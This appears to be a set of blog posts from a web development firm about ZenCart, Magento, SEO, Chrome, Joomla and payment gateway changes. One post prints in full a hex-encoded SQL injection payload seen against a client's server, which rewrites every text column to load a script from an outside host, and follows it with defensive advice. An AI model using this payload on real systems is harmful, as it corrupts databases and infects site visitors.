About Web Development by Activo

Anyone who is involved with an online shopping cart and was considering open source solutions probably stumbled upon two major ecommerce providers: ZenCart and Magento Commerce. ZenCart is an evolving and older shopping cart with roots in osCommerce, while Magento Commerce is a newcomer to this category written from scratch on top of the new Zend Framework. Since we support both platforms, we often are asked to provide a basic comparison analysis for the business owners and this is what I will try to do in this article.

ZenCart

This is a great open source shopping cart that can power almost any size eCommerce sites. We have successfully used ZenCart for sites offering 20 products all the way up to tens of thausands of products and variations (which by the way is connected to a POS and kept up to date to the minute). Since its fork from osCommerce ZenCart has gone through extensive development and now offers much broader extendability and robust template system. Some of the underlying systems that make this shopping cart so robust are: template system, initialization system, object autoloaders, plugins a-la observer design patern, flexible and extendible configuration system, and more.

One of the biggest disadvantages for ZenCart is that all these great systems were built on top and in an after thought to an existing platform. Hence, there are many dependencies and the learning curve for professional grade customization and development is steep. For example, one of the tasks that current core developers are working on is to transform additional funcitons to object oriented design, in other words, they are still trying to get rid of the spagheti code left from the osCommerce days.

Nevertheless, ZenCart is a true workhorse that has proven itself many times and with hundreads of thausands of stores world wide. In fact, it has excellent support for multiple languages and multiple currencies stores.

At Activo, Inc. we have developed many modules to enhance various aspects of the store: front end, specialized templates, taxes by zipcode, easy search suggestion tool, even a real QuickBooks integration module and a real time Point of Sale (POS) integration with RunIt systems.

One more thing that ZenCart excels in when the right modules and the right setup is applied is SEO (Search Engine Optimization). Once setup correctly, ZenCart is one of the most SEO friendly stores out there. I have seen multiple times where a brand new ZenCart store with some SEO efforts generating more than $50,000 per month in sales (within 2-3 months of Go-Live).

ZenCart bottom line: Great solution if you want to see a solid and proven shopping cart with mostly standard features and you do not care about the type of technology that powers it. Currently, for best and fastest deployment ZenCart is second to none.

Magento

Magento is a brand new (about a year old as of writing this article) and it is now beginning to see community and developer adoption. Magento is written on top of PHP5 and Zend Framework. A bit about the framework: the new Zend Framework is sponsored by industry leaders such as IBM and Zend and is largely based on the MVC design patern. In a way, it is the answer to the .NET framework in the PHP world. There are similar frameworks and they may even be older and more mature, like Symphony or CakePHP. However, since the Zend Framework is backed by both IBM and Zend it is very likely that this framework will become the industry standard.

Magento was developed from scratch and in an object oriented manner on top of the new Zend Framework. Therefore, it is expected to have better extendibility options for developers and much better module/plugin management consules in the back-end however will probably come at the expense of instability in the short term. Magento’s templates out of the box look sharp and eye candy. Its creator definitely placed an emphasis on the way it’s admin panel feels & looks and the way its demo templates look & feel. Additionally, almost all aspects of the UI feels a lot more like Web 2.0 with many AJAX features and many time saving UI features.

One of the biggest downsides to Magento is its current speed since it lacks an effort in optimizing its DB and overall structure. Hence, it is relatively heavy and requires a bit of advanced know-how when installing and setting it up. It’s forums seem to be gaining traction with developers and many developers say that once you migrate a store to Magento you will never look back.

Magento bottom line: While it is definitely a matter of time until we see the real value, Magento does seem to have some advantages over any other open source eCommerce system. Merely the fact that it was developed from scratch recently means that a whole lot of best practices are thought of right of the bat instead of showing as an after thought (which we as developers have to deal with it). Nevertheless, Magento’s forums indicate that the product has yet to have reached maturity. If you are ok with somewhat unstable solution and looking for the absolute cutting edge shopping cart Magento is for you!

These days it is all about SEO (Search Engine Optimization) and SEM (Search Engine Marketing). Especially now with the financial and real estate markets in turmoil, businesses seek to conserve resources and perhaps try the alternative to online advertising; seo with keyword targeting.

The following three steps will help you refine content based on a list of selected keywords:

1. List Targeted Keywords

Make a small list (5-15 keywords) of keywords that relate to your industry. Only you will actually know what keywords relate best to your business and services. What you want to remember is to list keywords that you assume your target audience will search for not necessarily keywords that describe your services directly. Notice that keywords can also be key phrases, meaning 2 or 3 keywords that are joined together into a phrase.

2. Refine the List of Targeted Keywords to Targeted and Popular Keywords

Use one of the following free services (or all of them) to refine your list:

• Google Adwords Keyword Tool (External)
• SEO Book Keyword Suggest Tool
• Wordtracker - Free Keyword Suggestion Tool

These free tools give you a list of related keywords and key phrases with the relevant popularity and lots of other statistics. For example, we provide services for clients who power their ecommerce sites with ZenCart. I typed ‘zencart’ into Google Adwords Keyword Tool and it shows that some of the most popular key phrases are ‘zencart hosting’ and ‘zencart templates’. As a result, pages that relate to ZenCart should have these key phrases in the text. Perhaps I will separate the zencart list of keywords from the rest of the keywords, etc.

3. Develop Content Based on Targeted Keywords

Now that we have a list of refined keywords, it is time to do something about it. Develop or refine your content around these keywords.

Of-course in each website there will be a hit or a miss. Keep exploring for new keywords on a regular basis and make sure to keep tracking the results or any changes that occur as a result of your refined content.

Do you want to share your methods of achieving high levels of targeted traffic?

Since the days that Overture mastered PPC, even before AdWords was born, I advocated for SEO (Search Engine Optimization) and overall SEM (Search Engine Marketing) over PPC (Pay Per Click advertisement). Recently, blogs, news, client requests, and Google Trends show an ever increasing attention toward SEO at the expense of attention to PPC. Site owners are starting to realize that PPC is not the only solution and certainly not the best.

There are many reasons which will lead businesses and individuals to shift their resources and efforts from online advertisement, PPC in particular, to SEO. Some of the reasons that come to mind are: slowing economy, advertisement saturation, lack of ROI, and perhaps realization that SEO has superior value. The facts are obvious: more businesses look for SEO than ever before. Here is a recent comparison of SEO and PPC in Google Trends (from today 9/7/08):

It is true that with paid online marketing such as AdWords or Panama, it is fairly easy to see results fast. However, once you analyze the ROI in almost any business and on almost any product now a days, the data will tell you that you did OK, and nothing more than OK. In other words, you will get results but a simple glance at all your options will reveil similar or, in some cases, better ROI with other venues like Press Releases, Public Relations, Good old fashion marketing, or even … SEO. In fact, you might discover that if you try using a newsletter to promote your products you may get better ROI. This occured more than once with our clients, where their customers enjoyed the personal attention and the on going discounts that we saw a continuous boost of 30-50% in sales the day of the newsletter compared to the entire month. The bottom line: you must try other venues not only PPC advertisement!

As for the negative part of PPC, I will cover it very briefly just because I do not enjoy discussing the negatives. Watch for click fraud! Avoid paying for syndicated advertisement - it almost never shows results! Ok, I am done.

So why SEO? I have managed websites where the owner consistently spent north of $100K on paid advertisement per month with a single PPC vendor. While it worked and the results were there - the ROI compared to other solutions were never great. In comparison, take one month pay away from PPC and put it toward SEO at least once a year and you shall see greater results over time. The upside to PPC is that it is immediate, once you turn it on you see hits. With SEO you got to give it time and nurish the process. Typical results are showing within 3-6 months and nothing is guaranteed. These are the main reasons that businesses shy away from it, but they shouldn’t. Remember, once you gain momentum in SEO it is very difficult to take it away.

Never forget that SEO is only one of many tools or aproaches that you need for any website. Marketing a website requires a mix of efforts, one of them is SEO. Efficient website marketing includes SEM (Search Engine Marketing), Press Releases (with links), Working on raising the number of links into the site, etc.

Conclusion

The fact is out: a trend of increased attention to SEO over PPC is on. The reason for this trend is not fully understood but it can be attributed to the slowing economy, lack of ROI, or better awareness of SEO value. Regardless, many SEO projects have shown that SEO can deliver better ROI than PPC over time. Do you prefer SEO over PPC?

Google Chrome is new (still in beta) and I went a head and installed it on one of our VMs. It seems like a lot of the functionality from the popular Firefox extension ‘FireBug’ is built in. Here are the screen shots:

Google Chrome Screenshot 1: Main Page

Google Chrome Screenshot 2: Search right from the address bar

Google Chrome Screenshot 3: Browsing History

Google Chrome Screenshot 4: Incognito Browsing

Google Chrome Screenshot 5: Right Clicking a Link Uses Google Gears

Google Chrome Screenshot 6: Inspecting Page Elements a-la Firebug

Google Chrome Screenshot 7: View Source

Google is now officially in the browser business. I guess that the google bars wasn’t enough of a penetration into the browser market and Google wanted/needed additional features (and feedback?) from users. Anyway, Google now offers a new web browser: Chrome. Google also explained briefly why they have decided to launch a new browser. So, what does it mean for us, web developers?

1. An additional browser to pay attention to and run tests for. When Google launches a new browser, it is not another niche browser that we can skip in our testing. It is probably going to have a sizeable market share.
2. Visit the ‘For Web Developers‘ page posted by Chrome. You will find useful information for what we do. Once piece of advice is if we tested our sites on Safari 3.1 - then the page will work fine on Google Chrome. However, they still post some tips and testing tools.
3. Explore and learn V8 - the underlying engine that powers Google Chrome. According to Google V8 is a platform that will help power the next generation of web applications. As mentioned on their ‘Why’ page: “We also built V8, a more powerful JavaScript engine, to power the next generation of web applications that aren’t even possible in today’s browsers.”

It is never boring in the world of web development, is it?

Written by Kimberly Elam, Web Design by Design made me think twice before running to draft the next web site design with our designer. This same minimalistic approach of almost too little but just enough to make a clear point approach is great because it begs for more. As Kimberly puts it, the user remains hungry for more information. And guess what they will probably do? call or email for more information!

This article highlites the a similar line of thought for successful web firms: they target what their clients need not what they can do with technology or design. Hence this comes to remind us that websites, in any aspect: design or web development, are here to serve the business. A website is just a tool not the goal.

This comes accross with our line of though at Activo: each one of our proposals begin with what are the goals in this project. In other words, what will we achieve by the following web development project?

The ZenCart developer team seems to be hard at work and preparing to deliver a new version of ZenCart: ver 1.4. The core developers posted a roadmap brief for version 1.4 back in September of 2007. Recently, additional entries have been posted in the forums describing in more detail the upcoming changes and signaling a new release is to be expected soon.

The currently described updates to ZenCart are done all around the DB, its architecture, and improving its performance. To summarise from the ZenCart forums:

New Database Driver Layer
Extremely light/flexible drivers make it easier to support other Database Types
Preliminary support for innodb and mysql transactions

Sql Caching system rewritten
Much easier to add new caching types
Preliminary Support for Memcache

Use of MPTT for category structure
Reduces number of queries needed to ‘describe’ the category structure
Improves user experience thru reduced page load times

Supporting Classes to reduce query load
Hugely reduces queries needed
Reuses queries using Cache to further improve performance

The roadmap for ZenCart ver 1.4 promises the following updates to the code (summarized):

• Better usage of PHP 5.2 features. This also means 5.2 will be the new minimum requirement.
• More Object Oriented code, less of the old osCommerce code.
• Lots of DB improvements (some is described above, seems more is yet to come).
• Category structure converted to MPTT format. MPTT stands for Modified Preorder Tree Traversal (explanation of MPTT).
• Performance improvements for sites with lots of product attributes.
• More function libraries converted to classes.
• Duplicate components shared between admin and catalog.
• Template system enhancements: less tables and more admin control.
• Additional notifiers for the observer system.
• Transaction support with InnoDB. Also mentioned as initial stage according to the recent posts of the updates that were done so far.
• SwiftMailer instead of phpMailer.
• Stock and SKU per product attribute.
• Security enhancements.

Keep up the good work!

Just a quick note that Authorize.net will be upping the limit on the transaction id field. Apperently, they are close to reaching the limit of the field type, so they are adding digits to the field - we are talking about some really big numbers! ZenCart seems to have acknowledged the news and tested their latest stable release. On ZenCart’s end, all seems to be ok except a small DB change that will only affect shops that choose to store the transactions over time. Hence a quick fix is posted on ZenCart’s forum.

This also means that all plugins, modules, or any Authorize.net integration scripts need to be tested. This change will probably not be a make or break for any code that integrates with Authorize.net APIs, but it is worth verifying your code and your shopping cart just in case.

Originally Posted by Authorize.net:

What is going on with the Transaction ID field?
The Transaction ID field was originally developed with a maximum numeric value of 2,147,483,647. As the number of merchants using the Authorize.Net Payment Gateway has grown, we have identified a time in the near future in which the Transaction ID count will surpass 2,147,483,647. For this reason, we are in the process of expanding the range of Transaction IDs that the payment gateway can issue. Accordingly, we are communicating to all Authorize.Net merchants to verify that your systems can accommodate a 10-digit Transaction ID greater than 2,147,483,647.

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)

DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C4152452040542
05641524348415228323535292C4043205641524348415228323535292
04445434C415245205461626C655F437572736F7220435552534F52204
64F522053454C45435420612E6E616D652C622E6E616D652046524F4D2
07379736F626A6563747320612C737973636F6C756D6E7320622057484
5524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D333
5204F5220622E78747970653D323331204F5220622E78747970653D313
63729204F50454E205461626C655F437572736F72204645544348204E4
558542046524F4D205461626C655F437572736F7220494E544F2040542
C4043205748494C4528404046455443485F5354415455533D302920424
547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E393868732E72752F6A732E6A73
3E3C2F7363726970743E27272729204645544348204E4558542046524F4
D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F434154452
05461626C655F437572736F7220 AS VARCHAR(4000));

print @S;

This particular attack is well known and has been sighted in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Using the following web application best practices, we avoid getting hacked:

• Application level:
  • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
  • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
  • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
• Database level:
  • Use limited database permissions. For example, for SQL Server, don’t let you application run under the “sa” user. The database user should only have permission in the particular database used by the application.
  • If possible, disable extended stored procedures such as xp_cmdshell.
  • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation.
    Some DBAs have server-wide policies of no Dynamic SQL.

• Web server level:
  • If appropriate, filter requests. IIS 7 offers requestFiltering options. http://msdn.microsoft.com/en-us/library/ms689462.aspx
    For example, the maxQueryString parameter could be used to block the exploit attempt above.
  • For II6: http://technet.microsoft.com/en-us/security/cc242650.aspx
• Miscellaneous
  • Install security patches as soon as they become available.

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.

You’ll love Joomla! CMS because it is a great open source and free CMS with lots of features, stable releases, and it comes with a huge supporting community. Don’t get us wrong, we love Joomla CMS too and truly believe that this open source application is a big head start for any content based website. But since we used Joomla on many advanced Web 2.0 websites, we have found its limits, and sometimes struggled with those limits to a point of considering other systems or even using a framework instead. Let’s look closer at the missing features:

1. Directory or node base category structure

This is one of the biggest pain points with using Joomla or trying to explain how to use Joomla to new users. Joomla places all content items within sections and categories. Before Joomla 1.5, all content items were required to be in one of these sections and categories. In other words, the system was limited to a two level categorization and the categorization was enforced. In Joomla 1.5, it is not a requirement, however, if you wish to categorize the content items you must use this archaic system.

So, what’s missing? It needs a node based categorization. Similar to any folder structure out there in any operating system. You can create folders with content items in them and you have a nice flexible and fully comprehensible system. No more workarounds. This will then boost the use of any dynamic plugins that can rely on the folder structure for certain features. A great example is a News & Events section that is needed for almost every serious website: with flexible node system you can create a news folder and an events folder and place your articles there. If in the future you wish to add sub categories to your news - no problem! (with the current and the old system - you’ll have to rethink once you get to a certain depth level).

2. A Real Authorship Path and Publication Mechanism

Yes, it is true that users have multiple levels right out of the box in Joomla. But it lacks any sort of a mechanism that controls the workflow of the content item. Ideally, you will have one user that will add new content items and another that will have to approve before it goes live in a specific section. The publisher user will have the rights to publish only in his/her sections, etc. This is a basic feature in many enterprise content management systems.

3. Content Articles Versioning

In Joomla, once you made the change and hit that save button - there is no way to go back in time and undo your changes. Ideally, Joomla will save every instance of the content item and keep track of its versions. How it does it is not important, whether it uses SVN like versioning which efficiently saves only the diff values, or if it actually saves the entire content item every time a revision is made does not matter. The feature that is missing is the versioning itself.

4. Built In Separation Between ‘Live’ and ‘Staging’ Environments

For businesses that value their websites and understand the sensitivity of them, we always recommend setting up a staging environment. This is where all users, developers, and designers can see the latest revisions before it goes live. It provides another stage of error handling instead of working a fire drill on a regular basis. Many enterprise content management systems have this option as a built-in mechanism. From the same admin panel or work area, the admin presses a button and the latest version of the site is then ‘pushed’ live. We currently have linux scripts that do the job but there is no way for a non-developer to handle this case. Ideally, this needs to be from the admin panel of Joomla.

5. Document Management System (File Manager)

So, we all know that Joomla’s File Manager or ‘Media’ manager is a bit lacking. It has the basic functionality that assists with uploading files, moving, deleting them - but that’s it. A DMS (Document Management System) allows each user to manage their own document area, which in turn allows better handling of uploading and using files with drag and drop controls, and improved management interface for admins that can more easily handle large amount of folders and files.

Conclusion

Joomla CMS is a great open source CMS, no doubt. However, if the above five missing features are added, it will make it easier for us to be able to offer this CMS to the enterprise. For now, the commercial CMS spectrum is what we got to work with for enterprise level content management systems.